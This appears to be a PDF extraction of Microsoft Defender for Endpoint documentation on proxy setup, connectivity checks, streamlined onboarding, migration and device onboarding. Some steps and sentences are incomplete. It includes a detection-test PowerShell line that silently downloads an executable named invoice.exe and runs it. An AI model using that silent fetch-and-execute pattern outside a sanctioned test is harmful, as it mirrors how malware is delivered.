"HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet"
For resiliency purposes and the real-time nature of cloud-delivered protection, Microsoft Defender
Antivirus will cache the last known working proxy. Ensure your proxy solution does not perform SSL
inspection. This will break the secure cloud connection.
Microsoft Defender Antivirus will not use the static proxy to connect to Windows Update or
Microsoft Update for downloading updates. Instead, it will use a system-wide proxy if configured to
use Windows Update, or the configured internal update source according to the configured fallback
order.
If required, you can use Administrative Templates > Windows Components > Microsoft Defender
Antivirus > Define proxy auto-config (.pac) for connecting to the network. If you need to set up
advanced configurations with multiple proxies, use Administrative Templates > Windows
Components > Microsoft Defender Antivirus > Define addresses to bypass proxy server and
prevent Microsoft Defender Antivirus from using a proxy server for those destinations.
You can use PowerShell with the Set-MpPreference cmdlet to configure these options:
ProxyBypass
ProxyPacUrl
ProxyServer
７ Note
To use the proxy correctly, configure these three different proxy settings:
Microsoft Defender for Endpoint (MDE)

AV (Antivirus)
Endpoint Detection and Response (EDR)
Configure the proxy server manually using netsh

command
Use netsh to configure a system-wide static proxy.
７ Note
This will affect all applications including Windows services which use WinHTTP with default
proxy.

netsh winhttp set proxy <proxy>:<port>
For example: netsh winhttp set proxy 10.0.0.6:8080
To reset the winhttp proxy, enter the following command and press Enter:

netsh winhttp reset proxy
See Netsh Command Syntax, Contexts, and Formatting to learn more.
Next step
STEP 3: Verify client connectivity to Microsoft Defender for Endpoint service URLs
Related articles
Disconnected environments, proxies and Microsoft Defender for Endpoint
Use Group Policy settings to configure and manage Microsoft Defender Antivirus
Onboard Windows devices
Troubleshoot Microsoft Defender for Endpoint onboarding issues
Onboard devices without Internet access to Microsoft Defender for Endpoint
 Tip
Do you want to learn more? Engage with the Microsoft Security community in our Tech Community:
Microsoft Defender for Endpoint Tech Community .
Feedback

STEP 3: Verify client connectivity to
Microsoft Defender for Endpoint service
URLs
Article • 10/25/2023
Applies to:

） Important

Check that clients are able to connect to the Defender for Endpoint service URLs using
the Defender for Endpoint Client Analyzer to ensure that endpoints are able to
communicate telemetry to the service.
For more information on the Defender for Endpoint Client Analyzer, see Troubleshoot
sensor health using Microsoft Defender for Endpoint Client Analyzer.
７ Note
You can run the Defender for Endpoint Client Analyzer on devices prior to
onboarding and after onboarding.
When testing on a device onboarded to Defender for Endpoint, the tool will
use the onboarding parameters.
When testing on a device not yet onboarded to Defender for Endpoint, the
tool will use the defaults of US, UK, and EU.
７ Note
For the streamlined onboarding public preview, when testing connectivity on
devices not yet onboarded to Defender for Endpoint, run mdeclientanalyzer.cmd
with -o <path to MDE onboarding package > . The command will use geo parameters
from the onboarding script to test connectivity. Otherwise, the default pre-
onboarding test runs against the standard URL set. See the following section for
more details.
Verify that the proxy configuration is completed successfully. The WinHTTP can then
discover and communicate through the proxy server in your environment, and then the
proxy server allows traffic to the Defender for Endpoint service URLs.
1. Download the Microsoft Defender for Endpoint Client Analyzer tool where
Defender for Endpoint sensor is running on.
2. Extract the contents of MDEClientAnalyzer.zip on the device.

command
HardDrivePath\MDEClientAnalyzer.cmd
Replace HardDrivePath with the path, where the MDEClientAnalyzer tool was
downloaded. For example:
command
C:\Work\tools\MDEClientAnalyzer\MDEClientAnalyzer.cmd
5. The tool creates and extracts the MDEClientAnalyzerResult.zip file in the folder to
use in the HardDrivePath.
6. Open MDEClientAnalyzerResult.txt and verify that you've performed the proxy

configuration steps to enable server discovery and access to the service URLs.
The tool checks the connectivity of Defender for Endpoint service URLs. Ensure the
Defender for Endpoint client is configured to interact. The tool prints the results in
the MDEClientAnalyzerResult.txt file for each URL that can potentially be used to
communicate with the Defender for Endpoint services. For example:
text
Testing URL : https://xxx.microsoft.com/xxx

1 - Default proxy: Succeeded (200)
2 - Proxy auto discovery (WPAD): Succeeded (200)
3 - Proxy disabled: Succeeded (200)
4 - Named proxy: Doesn't exist
5 - Command line proxy: Doesn't exist
If any one of the connectivity options returns a (200) status, then the Defender for
Endpoint client can communicate with the tested URL properly using this connectivity
method.
However, if the connectivity check results indicate a failure, an HTTP error is displayed
(see HTTP Status Codes). You can then use the URLs in the table shown in Enable access
to Defender for Endpoint service URLs in the proxy server. The URLs available for use
depend on the region selected during the onboarding procedure.
７ Note
The Connectivity Analyzer tool's cloud connectivity checks are not compatible with
Attack Surface Reduction rule Block process creations originating from PSExec
and WMI commands. You will need to temporarily disable this rule, to run the
connectivity tool. Alternatively, you can temporarily add ASR exclusions when
running the analyzer.
When the TelemetryProxyServer is set in Registry or via Group Policy, Defender for
Endpoint will fall back, it fails to access the defined proxy.
(Public preview) Testing connectivity to the

streamlined onboarding method
If you're testing connectivity on a device that hasn't yet been onboarded to Defender
for Endpoint using the streamlined approach (relevant for both new and migrating
devices):
1. Download the streamlined onboarding package for relevant OS.
2. Extract the .cmd from onboarding package.

3. Follow the instructions in the previous section to download the Client Analyzer.
4. Run mdeclientanalyzer.cmd -o <path to onboarding cmd file> from within the

MDEClientAnalyzer folder. The command uses geo parameters from the
onboarding script to test connectivity.
If you're testing connectivity on a device onboarded to Defender for Endpoint using the
streamlined onboarding package, run the Defender for Endpoint Client Analyzer as
normal. The tool uses the configured onboarding parameters to test connectivity.
For more info on how to access streamlined onboarding script, see Onboarding devices
using streamlined device connectivity.
Next step
Onboard Windows Client Onboard Windows Server Onboard non-Windows devices
Feedback

Onboarding devices using streamlined
connectivity for Microsoft Defender for
Endpoint
Article • 02/01/2024
Applies to:

） Important

７ Note
The streamlined onboarding method is currently in public preview. Make sure to

review the prerequisites to confirm requirements and supported operating systems.
The Microsoft Defender for Endpoint service may require the use of proxy
configurations to report diagnostic data and communicate data to the service. Prior to
the availability of the streamlined connectivity method, other URLs were required and
Defender for Endpoint static IP ranges weren't supported. For more information on full
MDE connectivity processes, see STEP 1: Configure your network environment to ensure
connectivity with Defender for Endpoint service.
This article describes the streamlined device connectivity method and how to onboard
new devices to use a simpler deployment and management of Defender for Endpoint
cloud connectivity services. For more information on migrating previously onboarded
devices, see Migrating devices to streamlined connectivity.
To simplify network configuration and management, you now have the option of
onboarding devices to Defender for Endpoint using a reduced URL set or static IP
ranges. See, streamlined URL list
The Defender for Endpoint-recognized simplified domain:
*.endpoint.security.microsoft.com replaces the following core Defender for Endpoint
services:
Cloud Protection/MAPS
Malware Sample Submission Storage
Auto-IR Sample Storage
Defender for Endpoint Command & Control
EDR Cyberdata
To support network devices without hostname resolution or wildcard support, you can
alternatively configure connectivity using dedicated Defender for Endpoint static IP
ranges. For more information, see Configure connectivity using static IP ranges.
７ Note
The simplified connectivity method will not change how Microsoft Defender for
Endpoint functions on a device nor will it change the end-user experience. Only
the URLs or IPs that a device uses to connect to the service will change.
） Important
Preview limitations and known issues:
Streamlined connectivity does not support onboarding through API (includes

Microsoft Defender for Cloud and Intune).
This onboarding method has specific prerequisites that do not apply to the
standard onboarding method.
Consolidated services
The following Defender for Endpoint URLs consolidated under the streamlined domain
should no longer be required for connectivity if *.endpoint.security.microsoft.com is
allowed and devices are onboarded using the streamlined onboarding package. You will
need to maintain connectivity with other required services not consolidated that are
relevant to your organization (for example, CRL, SmartScreen/Network Protection, and
WNS).
For the updated list of required URLs, see Download the spreadsheet here .
） Important
If you are configuring using IP ranges, you will need to separately configure the
EDR cyberdata service. This service is not consolidated on an IP level. See section
below for more details.
ﾉ Expand table
Category Consolidated URLs
MAPS: cloud-delivered *.wdcp.microsoft.com

protection *.wd.microsoft.com
Cloud protection & unitedstates.x.cp.wd.microsoft.com

security intelligence europe.x.cp.wd.microsoft.com
updates for macOS and unitedkingdom.x.cp.wd.microsoft.com
Linux x.cp.wd.microsoft.com
https://www.microsoft.com/security/encyclopedia/adlpackages.aspx
Malware Sample ussus1eastprod.blob.core.windows.net

Submission Storage ussus2eastprod.blob.core.windows.net
ussus3eastprod.blob.core.windows.net
ussus4eastprod.blob.core.windows.net
wsus1eastprod.blob.core.windows.net
wsus2eastprod.blob.core.windows.net
ussus1westprod.blob.core.windows.net
wsus1westprod.blob.core.windows.net
usseu1northprod.blob.core.windows.net
wseu1northprod.blob.core.windows.net
usseu1westprod.blob.core.windows.net
wseu1westprod.blob.core.windows.net
ussuk1southprod.blob.core.windows.net
wsuk1southprod.blob.core.windows.net
ussuk1westprod.blob.core.windows.net
wsuk1westprod.blob.core.windows.net
Defender for Endpoint automatedirstrprdcus.blob.core.windows.net

Auto-IR Sample Storage automatedirstrprdeus.blob.core.windows.net
automatedirstrprdcus3.blob.core.windows.net
automatedirstrprdeus3.blob.core.windows.net
automatedirstrprdneu.blob.core.windows.net
automatedirstrprdweu.blob.core.windows.net
Category Consolidated URLs
automatedirstrprdneu3.blob.core.windows.net
automatedirstrprdweu3.blob.core.windows.net
automatedirstrprduks.blob.core.windows.net
automatedirstrprdukw.blob.core.windows.net
Defender for Endpoint winatp-gw-cus.microsoft.com

Command and Control winatp-gw-eus.microsoft.com
winatp-gw-cus3.microsoft.com
winatp-gw-eus3.microsoft.com
winatp-gw-neu.microsoft.com
winatp-gw-weu.microsoft.com
winatp-gw-neu3.microsoft.com
winatp-gw-weu3.microsoft.com
winatp-gw-uks.microsoft.com
winatp-gw-ukw.microsoft.com
EDR Cyberdata events.data.microsoft.com

us-v20.events.data.microsoft.com
eu-v20.events.data.microsoft.com
uk-v20.events.data.microsoft.com
Before you begin

Devices must meet specific prerequisites to use the streamlined connectivity method for
Defender for Endpoint. Ensure the prerequisites are met before proceeding with
onboarding.
Prerequisites
License:

Minimum KB update (Windows)
SENSE version: 10.8040.*/ March 8, 2022 or higher (see table)
Microsoft Defender Antivirus versions (Windows)
Antimalware Client: 4.18.2211.5

Engine: 1.1.19900.2
Antivirus (Security Intelligence): 1.391.345.0
Defender Antivirus versions (macOS/Linux)
macOS supported versions with MDE product version 101.23102.*+

Linux supported versions with MDE product version 101.23102.*+
Supported Operating Systems
Windows 10 version 1809 or later

Windows 10 versions 1607, 1703, 1709, 1803 are supported on the streamlined
onboarding package but require a different URL list, see streamlined URL sheet
Windows 11
Windows Server 2019
Windows Server 2022
Windows Server 2012 R2, Server 2016 R2, fully updated running Defender for
Endpoint modern unified solution (installation through MSI).
macOS supported versions with MDE product version 101.23102.*+
Linux supported versions with MDE product version 101.23102.*+
） Important
Devices running on MMA agent are not supported on the streamlined

connectivity method and will need to continue using the standard URL set
(Windows 7, Windows 8.1, Windows Server 2008 R2 MMA, Server 2012 &
2016 R2 not upgraded to modern unified agent).
Windows Server 2012 R2 and Server 2016 R2 will need to upgrade to unified
agent to leverage the new method.
Windows 10 1607, 1703, 1709, 1803 can leverage the new onboarding option
but will use a longer list. For more information, see streamlined URL sheet .
ﾉ Expand table
Windows OS Minimum KB Required (March 8, 2022)
Windows 11 KB5011493 (March 8, 2022)
Windows 10 1809, Windows Server 2019 KB5011503 (March 8, 2022)
Windows 10 19H2 (1909) KB5011485 (March 8, 2022)

Windows OS Minimum KB Required (March 8, 2022)
Windows 10 20H2, 21H2 KB5011487 (March 8, 2022)
Windows 10 22H2 KB5020953 (October 28, 2022)
Windows 10 1803* < end of service >
Windows 10 1709* < end of service >
Windows Server 2022 KB5011497 (March 8, 2022)
Windows Server 2012 R2, 2016* Unified Agent
Windows Server 2016 R2 Unified Agent
Streamlined connectivity process

The following illustration shows the streamlined connectivity process and the
corresponding stages:
Stage 1. Configure your network environment for cloud

connectivity
Once you confirm prerequisites are met, ensure your network environment is properly
configured to support the streamlined connectivity method. Using the streamlined
method (preview), follow the steps outlined in Configure your network environment to
ensure connectivity with Defender for Endpoint service.
Defender for Endpoint services consolidated under the simplified method should no
longer be required for connectivity. However, some URLs aren't included in the
consolidation.
Streamlined connectivity allows you to use the following option to configure cloud
connectivity:
Option 1: Use the simplified domain

Option 2: Use static IP ranges
Option 1: Configure connectivity using the simplified domain
Configure your environment to allow connections with the simplified Defender for
Endpoint domain: *.endpoint.security.microsoft.com . For more information, see
Configure your network environment to ensure connectivity with Defender for Endpoint
service.
You must maintain connectivity with remaining required services listed under the
updated list . For example, Certification Revocation List, Windows update,
SmartScreen.
Option 2: Configure connectivity using static IP ranges
With streamlined connectivity, IP-based solutions can be used as an alternative to URLs.

These IPs cover the following services:
MAPS
Malware Sample Submission Storage
Auto-IR Sample Storage
Defender for Endpoint Command and Control
） Important
The EDR Cyber data service must be configured separately if you are using the IP
method (this service is only consolidated on a URL level).You must also maintain
connectivity with other required services including SmartScreen, CRL, Windows
Update, and other services.
In order to stay up to date on IP ranges, it is recommended to refer to the following

Azure service tags for Microsoft Defender for Endpoint services. The latest IP ranges will
always be found in the service tag. For more information, see Azure IP ranges .
ﾉ Expand table
Service tag name Defender for Endpoint services included
MicrosoftDefenderForEndpoint MAPS, Malware Sample Submission Storage, Auto-IR Sample

Storage, Command and Control.
OneDsCollector EDR Cyberdata
Note: The traffic under this service tag isn't limited to Defender
for Endpoint and may include diagnostic data traffic for other
Microsoft services.
The following table lists the current static IP ranges. For latest list, refer to the Azure
service tags.
ﾉ Expand table
Geo IP Ranges
US 20.15.141.0/24
20.242.181.0/24
20.10.127.0/24
13.83.125.0/24
EU 4.208.13.0/24
20.8.195.0/24
UK 20.26.63.224/28
20.254.173.48/28
AU 68.218.120.64/28
20.211.228.80/28
） Important
In compliance with Defender for Endpoint security and compliance standards, your
data will be processed and stored in accordance with your tenant's physical
location. Based on client location, traffic may flow through any of these IP regions
(which correspond to Azure datacenter regions). For more information, see Data
Stage 2. Configure your devices to connect to Defender

for Endpoint service
Configure devices to communicate through your connectivity infrastructure. Ensure
devices meet prerequisites and have updated sensor and Microsoft Defender Antivirus
versions. For more information, see Configure device proxy and Internet connection
settings .
Stage 3. Verify client connectivity preonboarding

For more information, see Verify client connectivity.
The following preonboarding checks can be run on both Windows and Xplat MDE Client
analyzer: Download the Microsoft Defender for Endpoint client analyzer.
To test streamlined connectivity for devices not yet onboarded to Defender for
Endpoint, you can use the Client Analyzer for Windows using the following commands:
Run mdeclientanalyzer.cmd -o <path to cmd file> from within MDEClientAnalyzer

folder. The command uses parameters from onboarding package to test
connectivity.
Run mdeclientanalyzer.cmd -g <GW_US, GW_UK, GW_EU> , where parameter is of

GW_US, GW_EU, GW_UK. GW refers to the streamlined option. Run with applicable
tenant geo.
As a supplementary check, you can also use the client analyzer to test whether a device
meets pre-requisites: https://aka.ms/BetaMDEAnalyzer
７ Note
For devices not yet onboarded to Defender for Endpoint, client analyzer will test
against standard set of URLs. To test the streamlined approach, you will need to run
with the switches listed earlier in this article.
Stage 4. Apply the new onboarding package required for

streamlined connectivity
Once you configure your network to communicate with the full list of services, you can
begin onboarding devices using the streamlined method. Note that onboarding via API
isn't currently supported (includes Intune & Microsoft Defender for Cloud).
Before proceeding, confirm devices meet the prerequisites and have updated the sensor
and Microsoft Defender Antivirus versions.
To get the new package, in Microsoft Defender XDR, select Settings > Endpoints >
Device management> Onboarding.
Select the applicable operating system and choose "Streamlined (preview)" from the
Connectivity type dropdown menu.
For new devices (not onboarded to Defender for Endpoint) supported under this
method, follow onboarding steps from previous sections using the updated onboarded
package with your preferred deployment method:
Onboard Windows Client

Onboard Windows Server
Onboard non-Windows devices
Run a detection test on a device to verify it has been properly onboarded to
Exclude devices from any existing onboarding policies that use the standard onboarding
package.
For migrating devices already onboarded to Defender for Endpoint, see Migrating
devices to the streamlined connectivity. You must reboot your device and follow specific
guidance here.
When you're ready to set the default onboarding package to streamlined, you can turn
on the following Advanced Feature setting in the Microsoft Defender portal (Settings >
Endpoints > Advanced Features).
７ Note
Before moving forward with this option, validate that your environment is ready
and all devices meet prerequisites.
This setting sets the default onboarding package to 'streamlined' for applicable
operating systems. You can still use the standard onboarding package within the
onboarding page but you must specifically select it in the drop-down.
Feedback

Migrate devices to use the streamlined
connectivity method
Article • 02/01/2024
Applies to:

） Important

This article describes how to migrate (reonboard) devices that are currently onboarded
to Defender for Endpoint to use the streamlined device connectivity method. For more
information on streamlined connectivity, see Onboarding devices using streamlined
connectivity. Devices must meet the prerequisites listed in Streamlined connectivity.
In most cases, full device offboarding isn't required when reonboarding. You can run the
updated onboarding package and reboot your device to switch connectivity over. See
below for details on individual operating systems.
） Important
Preview limitations and known issues:
For device migrations (reonboarding): Offboarding is not required to switch

over to streamlined connectivity method. Once the updated onboarding
package is run, a full device reboot is required for Windows devices and a
service restart for macOS and Linux. For more information, see the details
included in this article.
Windows 10 versions 1607, 1703, 1709, and 1803 do not support
reonboarding. Offboard first and then onboard using the updated package.
These versions also require a longer URL list.
Devices running the MMA agent are not supported and must continue using
the MMA onboarding method.
Migrating devices using the streamlined

method
Migration recommendation:
Start small. It's recommended to start with a small set of devices first, apply the
onboarding blob using any of the supported deployment tools, then monitor for
connectivity. If you are using a new onboarding policy, to prevent conflicts make
sure to exclude device from any other existing onboarding policies.
Validate and monitor. After onboarding the small set of devices, validate that
devices have successfully onboarded and are communicating with the service.
Complete migration. At this stage, you can gradually roll out the migration to a
larger set of devices. To complete the migration, you can replace previous
onboarding policies and remove the old URLs from your network device.
Validate device prerequisites before proceeding with any migrations. This information
builds upon the previous article by focusing on migrating existing devices.
To reonboard devices, you will need to use the streamlined onboarding package. For
more information on how to access the package, see Streamlined connectivity.
Depending on the OS, migrations may require a device reboot or service restart once
the onboarding package is applied:
Windows: reboot the device
macOS: Reboot the device or restart the Defender for Endpoint service by running:
1. sudo launchctl unload /Library/LaunchDaemons/com.microsoft.fresno.plist

2. sudo launchctl load /Library/LaunchDaemons/com.microsoft.fresno.plist
Linux: Restart the Defender for Endpoint service by running: sudo systemctl
restart mdatp
The following table lists migration instructions for the available onboarding tools based
on the device's operating system.
Windows 10 and 11
Windows 10 and 11
） Important
Windows 10 version 1607, 1703, 1709, and 1803 do not support reonboarding.
To migrate existing devices, you will need to fully offboard and onboard using
the streamlined onboarding package.
For general information on onboarding Windows client devices, see Onboarding

Windows Client.
Confirm prerequisites are met: Prerequisites for using streamlined method.
Local script
Follow the guidance in Local script (up to 10 devices) using the streamlined
onboarding package. After completing the steps, you must restart the device for
device connectivity to switch over.
Group policy
Follow the guidance in Group policy using the streamlined onboarding package.
After completing the steps, you must restart the device for device connectivity to
switch over.
Microsoft Intune
Follow the guidance in Intune using the streamlined onboarding pacakge. After
completing the steps, you must restart the device for device connectivity to switch
over.

Follow the guidance in Configuration Manager.
VDI
Use the guidance in Onboard nonpersistent virtual desktop infrastructure (VDI)
devices. After completing the steps, you must restart the device for device
connectivity to switch over.
Verifying device connectivity with streamlined

method for migrated devices
You can use the following methods to check that you have successfully connected
Windows devices:
Client analyzer
Tracking with advanced hunting in Microsoft Defender XDR
Track locally using Event Viewer (for Windows)
Run tests to confirm connectivity with Defender for Endpoint services
Checking the registry editor
PowerShell detection test
For macOS and Linux, you can use the following methods:
MDATP connectivity tests

Use Defender for Endpoint Client Analyzer (Windows) to

validate connectivity after onboarding for migrated
endpoints
Once onboarded, run the MDE Client Analyzer to confirm your device is connecting to
the appropriate updated URLs.
Download the Microsoft Defender for Endpoint Client Analyzer tool where Defender for
Endpoint sensor is running.
You can follow the same instructions as in Verify client connectivity to Microsoft
Defender for Endpoint service. The script automatically uses the onboarding package
configured on the device (should be streamlined version) to test connectivity.
Ensure connectivity is established with the appropriate URLs.

Tracking with advanced hunting in Microsoft Defender
XDR
You can use advanced hunting in Microsoft Defender portal to view the connectivity
type status.
This information is found in the DeviceInfo table under the "ConnectivityType" column:
Column Name: ConnectivityType

Possible Values: <blank> , Streamlined, Standard
Data type: String
Description: Type of connectivity from the device to the cloud
Once a device is migrated to use the streamlined method and the device establishes
successful communication with the EDR command & control channel, the value will be
represented as "Streamlined".
If you move the device back to the regular method, the value will be "standard".
For devices that have not yet attempted reonboard, the value will remain blank.
Tracking locally on a device through Windows Event

Viewer
You can use Windows Event Viewer's SENSE operational log to locally validate
connections with the new streamlined approach. SENSE Event ID 4 tracks successful EDR
connections.
Open the Defender for Endpoint service event log using the following steps:
1. On the Windows menu, select Start, then type Event Viewer. Then select Event
Viewer.
2. In the log list, under Log Summary, scroll down until you see Microsoft-Windows-
SENSE/Operational. Double-click the item to open the log.
You can also access the log by expandingApplications and Services
Logs>Microsoft>Windows>SENSE and select Operational.
3. Event ID 4 tracks successful connections with Defender for Endpoint Command &
Control channel. Verify successful connections with updated URL. For example:
Contacted server 6 times, all succeeded, URI: <region>.

<geo>.endpoint.security.microsoft.com.
<EventData>
<Data Name="UInt1">6</Data>
<Data Name="Message1">https://<region>.
<geo>.endpoint.security.microsoft.com>
</EventData>
4. Message1 contains the contacted URL. Confirm the event includes the streamlined
URL (endpoint.security.microsoft, com).
5. Event ID 5 tracks errors if applicable.
７ Note
SENSE is the internal name used to refer to the behavioral sensor that powers
Events recorded by the service will appear in the log.
For more information, see Review events and error using Event Viewer.
Run tests to confirm connectivity with Defender for

Endpoint services
Once the device is onboarded to Defender for Endpoint, validate that it's continuing to
appear in Device Inventory. The DeviceID should remain the same.
Check the Device Page Timeline tab to confirm events are flowing from the device.
Live Response
Ensure Live Response is working on your test device. Follow instructions in Investigate
entities on devices using live response.
Make sure to run a couple of basic commands post-connection to confirm connectivity

(such as cd, jobs, connect).
Automated investigation and response

Ensure that Automated investigation and response is working on your test device:
Configure automated investigation and response capabilities.
For Auto-IR testing labs, navigate to Microsoft Defender XDR > Evaluations & Tutorials
> Tutorials & Simulations > **Tutorials > Automated Investigation tutorials.
1. Open a Command Prompt as an administrator.
2. Right-click the item in the Start menu, select Run as administrator then select Yes
at the permissions prompt.
3. Use the following argument with the Microsoft Defender Antivirus command-line
utility (mpcmdrun.exe) to verify that your network can communicate with the
Microsoft Defender Antivirus cloud service:
"%ProgramFiles%\Windows Defender\MpCmdRun.exe" -ValidateMapsConnection
７ Note
This command will only work on Windows 10, version 1703 or higher, or Windows
11. For more information, see Manage Microsoft Defender Antivirus with the
mpcmdrun.exe commandline tool.
Test Block at First Sight
Follow instructions in Microsoft Defender for Endpoint Block at First Sight (BAFS)
demonstration.
Test SmartScreen
Follow instructions in Microsoft Defender SmartScreen Demo (msft.net) .
PowerShell detection test

1. On the Windows device, create a folder: C:\test-MDATP-test .
2. Open Command Prompt as an administrator.
3. In the Command Prompt window, run the following PowerShell command:
PowerShell

$ErrorActionPreference = 'silentlycontinue';(New-Object
MDATP-test\\invoice.exe');Start-Process 'C:\\test-MDATP-
test\\invoice.exe'
After the command runs, the Command Prompt window closes automatically. If
successful, the detection test is marked as completed.
For macOS and Linux, you can use the following methods:
MDATP connectivity tests

MDATP connectivity test (macOS and Linux)
Run mdatp health -details features to confirm simplified_connectivity: "enabled".
Run mdatp health -details edr to confirm edr_partner_geo_location is available. The

value should be GW_<geo> where 'geo' is your tenant's geo-location.
Run mdatp connectivity test. Ensure the streamlined URL pattern is present. You should
expect two for '\storage', one for '\mdav', one for '\xplat', and one for '/packages'.
For example: https:mdav.us.endpoint.security.microsoft/com/storage
Tracking with advanced hunting in Microsoft Defender

XDR
Follow the same instructions as for Windows.
Use Defender for Endpoint Client Analyzer (cross-

platform) to validate connectivity for newly migrated
endpoints
Download and run the client analyzer for macOS or Linux. For more information, see
Download and run the client analyzer.
1. Run mdeclientanalyzer.cmd -o <path to cmd file> from within the

MDEClientAnalyzer folder. The command uses parameters from the onboarding
package to test connectivity.
2. Run mdeclientanalyzer.cmd -g <GW_US, GW_UK, GW_EU> (where parameter is of

GW_US, GW_EU, GW_UK). GW refers to the streamlined option. Run with applicable
tenant geo.
Feedback

Defender for Endpoint onboarding
Windows Client
Article • 07/18/2023
Applies to:

Endpoint data loss prevention (DLP)
Insider risk management
You'll need to go through onboarding steps of the Defender for Endpoint portal to
onboard any of the supported devices. Depending on the device, you'll be guided with
appropriate steps and provided management and deployment tool options suitable for
the device.
Devices in your organization must be configured so that the Defender for Endpoint
service can get sensor data from them. There are various methods and deployment
tools that you can use to configure the devices in your organization.
In general, you'll identify the client you're onboarding, then follow the corresponding
tool appropriate to the device or your environment.
２ Warning
Repackaging the Defender for Endpoint installation package is not a supported
scenario. Doing so can negatively impact the integrity of the product and lead to
adverse results, including but not limited to triggering tampering alerts and
updates failing to apply.
Related topics
Onboard Windows devices using Microsoft Intune
Onboard Windows devices using Group Policy
Onboard Windows devices using a local script
Onboard non-persistent virtual desktop infrastructure (VDI) devices
 Tip
Feedback

Onboard Windows devices to Defender
for Endpoint using Intune
Article • 07/18/2023
Applies to:

You can use mobile device management (MDM) solutions to configure Windows 10
devices. Defender for Endpoint supports MDMs by providing OMA-URIs to create
policies to manage devices.
For more information on using Defender for Endpoint CSP see,

WindowsAdvancedThreatProtection CSP and WindowsAdvancedThreatProtection DDF
file .
Before you begin

Devices must be enrolled with Intune as your Mobile Device Management (MDM)
solution.
For more information on enabling MDM with Microsoft Intune, see Device enrollment
(Microsoft Intune).
Onboard devices using Microsoft Intune

Check out Identify Defender for Endpoint architecture and deployment method to see
the various paths in deploying Defender for Endpoint.
Follow the instructions from Intune.
For more information on using Defender for Endpoint CSP see,

WindowsAdvancedThreatProtection CSP and WindowsAdvancedThreatProtection DDF
file .
７ Note
The Health Status for onboarded devices policy uses read-only properties
and can't be remediated.
Configuration of diagnostic data reporting frequency is only available for
devices on Windows 10, version 1703.
Onboarding to Defender for Endpoint will onboard the device to Data Loss
Prevention (DLP), which is also a part of Microsoft 365 compliance.
Run a detection test to verify onboarding

After onboarding the device, you can choose to run a detection test to verify that a
device is properly onboarded to the service. For more information, see Run a detection
test on a newly onboarded Microsoft Defender for Endpoint device.
Offboard devices using Mobile Device

Management tools
For security reasons, the package used to Offboard devices will expire 30 days after the
date it was downloaded. Expired offboarding packages sent to a device will be rejected.
When downloading an offboarding package you'll be notified of the packages expiry
date and it will also be included in the package name.
７ Note
Onboarding and offboarding policies must not be deployed on the same device at
the same time, otherwise this will cause unpredictable collisions.
1. Get the offboarding package from Microsoft Defender portal :
a. In the navigation pane, select Settings > Endpoints > Device management >
Offboarding.
b. Select Windows 10 or Windows 11 as the operating system.
c. In the Deployment method field, select Mobile Device Management /

Microsoft Intune.
d. Click Download package, and save the .zip file.
2. Extract the contents of the .zip file to a shared, read-only location that can be
accessed by the network administrators who will deploy the package. You should
have a file named WindowsDefenderATP_valid_until_YYYY-MM-DD.offboarding.
3. Use the Microsoft Intune custom configuration policy to deploy the following
supported OMA-URI settings.
OMA-URI:
./Device/Vendor/MSFT/WindowsAdvancedThreatProtection/Offboarding
Date type: String
Value: [Copy and paste the value from the content of the
WindowsDefenderATP_valid_until_YYYY-MM-DD.offboarding file]
For more information on Microsoft Intune policy settings, see Windows 10 policy
settings in Microsoft Intune.
７ Note
The Health Status for offboarded devices policy uses read-only properties and
can't be remediated.
） Important
Offboarding causes the device to stop sending sensor data to the portal but data
from the device, including reference to any alerts it has had will be retained for up
to 6 months.
Related topics
Onboard Windows devices using Microsoft Endpoint Configuration Manager
Run a detection test on a newly onboarded Microsoft Defender for Endpoint
device
 Tip
Feedback

Onboard Windows devices using
Configuration Manager
Article • 12/06/2023
Applies to:

Microsoft Configuration Manager current branch
System Center 2012 R2 Configuration Manager
Prerequisites
Endpoint Protection point site system role
） Important
The Endpoint Protection point site system role is required so that antivirus and
attack surface reduction policies are properly deployed to the targeted endpoints.
Without this role, the endpoints in the device collection won't receive the
configured antivirus and attack surface reduction policies.
You can use Configuration Manager to onboard endpoints to the Microsoft Defender for
Endpoint service.
There are several options you can use to onboard devices using Configuration Manager:
Onboard devices using System Center Configuration Manager

Tenant attach
For Windows Server 2012 R2 and Windows Server 2016 - after completing the
onboarding steps, you'll need to Configure and update System Center Endpoint
Protection clients.
７ Note
Defender for Endpoint doesn't support onboarding during the Out-Of-Box
Experience (OOBE) phase. Make sure users complete OOBE after running Windows
installation or upgrading.
Note that it's possible to create a detection rule on a Configuration Manager

application to continuously check if a device has been onboarded. An application is
a different type of object than a package and program. If a device is not yet
onboarded (due to pending OOBE completion or any other reason), Configuration
Manager will retry to onboard the device until the rule detects the status change.
This behavior can be accomplished by creating a detection rule checking if the

"OnboardingState" registry value (of type REG_DWORD) = 1. This registry value is
located under "HKLM\SOFTWARE\Microsoft\Windows Advanced Threat
Protection\Status". For more information, see Configure Detection Methods in
System Center 2012 R2 Configuration Manager.
Configure sample collection settings

For each device, you can set a configuration value to state whether samples can be
collected from the device when a request is made through Microsoft Defender XDR to
submit a file for deep analysis.
７ Note
These configuration settings are typically done through Configuration Manager.
You can set a compliance rule for configuration item in Configuration Manager to
change the sample share setting on a device.
This rule should be a remediating compliance rule configuration item that sets the value
of a registry key on targeted devices to make sure they're compliant.
The configuration is set through the following registry key entry:
text
Path: "HKLM\SOFTWARE\Policies\Microsoft\Windows Advanced Threat Protection"

Name: "AllowSampleCollection"
Value: 0 or 1
Where Key type is a D-WORD. Possible values are:

0: Doesn't allow sample sharing from this device
1: Allows sharing of all file types from this device
The default value in case the registry key doesn't exist is 1.
For more information about System Center Configuration Manager Compliance, see
Introduction to compliance settings in System Center 2012 R2 Configuration Manager.
Onboard Windows devices using Microsoft Configuration

Manager
Collection creation
To onboard Windows devices with Microsoft Configuration Manager, the deployment
can target an existing collection or a new collection can be created for testing.
Onboarding using tools such as Group Policy or a manual method doesn't install any
agents on the system.
Within the Microsoft Configuration Manager console, the onboarding process will be
configured as part of the compliance settings within the console.
Any system that receives this required configuration maintains that configuration for as
long as the Configuration Manager client continues to receive this policy from the
management point.
Follow these steps to onboard endpoints using Microsoft Configuration Manager:
1. In the Microsoft Configuration Manager console, navigate to Assets and

Compliance > Overview > Device Collections.

2. Select and hold (or right-click) Device Collection and select Create Device
Collection.
3. Provide a Name and Limiting Collection, then select Next.


4. Select Add Rule and choose Query Rule.
5. Select Next on the Direct Membership Wizard and then select Edit Query
Statement.

6. Select Criteria and then choose the star icon.
7. Keep criterion type as simple value, choose whereas Operating System - build
number, operator as is greater than or equal to and value 14393, and select OK.

